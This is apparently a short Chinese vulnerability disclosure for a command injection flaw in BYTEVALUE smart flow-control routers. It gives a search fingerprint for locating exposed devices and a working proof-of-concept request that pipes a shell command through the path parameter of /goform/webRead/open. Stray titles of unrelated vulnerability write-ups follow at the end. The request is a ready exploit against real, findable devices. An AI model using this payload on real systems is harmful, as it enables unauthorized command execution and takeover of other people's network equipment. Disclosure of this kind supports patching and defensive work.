# 百为通达智能流控路由器 open 远程命令执行漏洞

# 漏洞描述

BYTEVALUE 百为流控路由器是一款追求带宽利用率的多功能路由器。百为智能流控路由器 /goform/webRead/open 路由存在有回显的命令注入漏洞。

# 漏洞影响

百为通达智能流控路由器

# 网络测绘

"BYTEVALUE 智能流控路由器"

# 漏洞复现

登陆页面

验证POC

GET /goform/webRead/open/?path=|id HTTP/1.1
Host:

1
2

KONE 通力电梯管理系统 appshowlog_lines.php 任意文件读取漏洞启明星辰 4A统一安全管控平台 getMaster.do 信息泄漏漏洞